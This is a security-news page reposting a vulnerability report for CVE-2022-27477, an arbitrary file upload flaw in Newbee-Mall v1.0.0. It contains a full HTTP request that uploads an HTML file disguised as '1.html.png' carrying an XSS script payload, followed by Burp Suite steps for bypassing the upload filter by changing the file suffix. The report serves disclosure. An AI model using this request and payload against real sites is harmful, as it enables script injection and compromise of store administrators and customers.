Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-27477: There is a File upload vulnerability exists in newbee-mall · Issue #63 · newbee-ltd/newbee-mall

Newbee-Mall v1.0.0 was discovered to contain an arbitrary file upload via the Upload function at /admin/goods/edit.

CVE
Open in Source
#xss#vulnerability#web#windows#apple#js#git#java

[Suggested description]
A file upload vulnerability exists in NewBee mall. Because the upload method of uploadcontroller can bypass the upload restriction by modifying the file format suffix.

[Vulnerability Type]
File upload vulnerability

[Vendor of Product]
https://github.com/newbee-ltd/newbee-mall

[Affected Product Code Base]
v1.0.0

[Affected Component]
POST /admin/upload/file HTTP/1.1
Host: localhost:28089
Content-Length: 671
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", “Chromium";v="92”
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost:28089/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoXATzrr6JWhnTx5Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
Referer: http://localhost:28089/admin/goods/edit/10907
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=11D044F12F07C3F2772AC7EE836610E2
Connection: close

------WebKitFormBoundaryoXATzrr6JWhnTx5Q
Content-Disposition: form-data; name="file"; filename="1.html.png"
Content-Type: image/png

<script type="text/javascript" src="http://www.qq.com/404/search_children.js" charset="utf-8" homePageUrl="{{domain}}" homePageName="{{siteName}}"></script>

        <script>alert("xss")</script>
    </div>
</div>

------WebKitFormBoundaryoXATzrr6JWhnTx5Q–

[Impact Code execution]
true

[Vulnerability proof]
1.Access address http://localhost:28089/admin/goods , select a commodity information to modify and enter the file upload page.
image
2.Open burpsuite packet capturing agent and click to upload pictures.
image
3.By default, the system only supports JPG, PNG and GIF files. We can bypass them by modifying the file suffix.
image
4.Modify the value of filename to 1.html
image
Get the access path to file upload
image
Complete data update
image
5.Access the upload file path, and the vulnerability reproduction is completed.
image

[Defective code]
image

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE